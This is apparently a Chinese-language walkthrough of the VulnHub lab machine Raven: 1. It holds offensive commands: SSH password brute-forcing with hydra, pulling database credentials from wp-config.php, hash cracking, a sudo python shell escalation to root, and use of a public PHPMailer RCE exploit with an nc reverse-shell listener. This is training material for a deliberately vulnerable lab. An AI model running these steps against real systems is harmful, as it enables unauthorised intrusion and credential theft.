目录

信息搜集

wpscan 扫描网站wordpress用户

 mysql获取wp_users信息

sudo python提权

补充：PHPMailer远程代码执行getshell

下载链接：Raven: 1 ~ VulnHub

描述

Raven 是一个初级/中级 boot2root 机器。 有四个flag可以找到和两种获取 root 的预期方式。 使用 VMware 构建并在 Virtual Box 上进行测试。 设置为使用 NAT 网络。

信息搜集

arp -scan -l 进行主机发现

靶机ip：192.168.236.139

nmap -A 192.168.236.139 扫描一下靶机开放的端口及服务

   访问一下80端口，在services那个板块 源码里发现了flag1

wpscan 扫描网站wordpress用户

dirb 扫描后台发现存在 /wordpress

wpscan --url http://192.168.236.139/wordpress --wp-content-dir -ep -et -eu

 得知用户有 michael 和 steven

尝试用该用户名进行SSH服务爆破

hydra 使用rockyou.txt字典 爆破ssh密码。得到用户 michael:michael   steven爆不出来

 尝试ssh远程登录michael 登陆成功

find / -name *flag*.txt 发现了flag2 在 /var/www/html/flag2.txt

 sudo -l 查看权限，发现不能

在/home里发现了 steven用户

 在 /wordpress里发现wp-config.php 得到了mql数据库的账户密码

可以 cat wp-config.php | egrep 'DB_USER|DB_PASSWORD'

root:[email protected]

  查看开放端口，开发3306 但是mysql 只允许本地登录。

 mysql获取wp_users信息

登录mysql试试

 在 databases 里的wordpress，wp_users表里 得到了用户及哈希密码值

 把其放入 sshkey文件里 john解密得到密码为pink84

ssh远程登录steven用户

 sudo -l 发现具有python的sudo权限。

注：  在wordpress表里。select * from wp_posts;

得到了flag3和flag4。

sudo python提权

尝试使用sudo Python提权。

sudo python -c 'import pty; pty.spawn("/bin/sh")'

sudo python -c 'import os; os.system("/bin/sh")'

之后whoami查看，发现是root权限 进入。root得到flag4

   补充：PHPMailer远程代码执行getshell

        除了上面我们爆破出 steven用户的密码拿shell，也可以利用PHPMailer 版本漏洞拿shell

 dirb我们扫描目录是，扫描出来了 /vendor 目录，进去之后发现了

 PATH 得到路径为： /var/www/html/vendor/

VERSION： 5.2.16  应该是PHPMailer的版本

利用searchsploit PHPMailer查看是否有漏洞，发现有漏洞利用脚本：

 searchsploit -m 40974.py

下载脚本文件 使用vim 命令进行修改

 根据各位置进行相应的修改 （注：靶机target应该为：http://ip/contact.php  而http://ip不行）

python 40974.py  运行

 在kali里另起一个终端，nc开启监听

nc -lvvp 4444

访问shell.php 拿到shell。之后就和上面一样，wp-config.php发现mysql信息登录。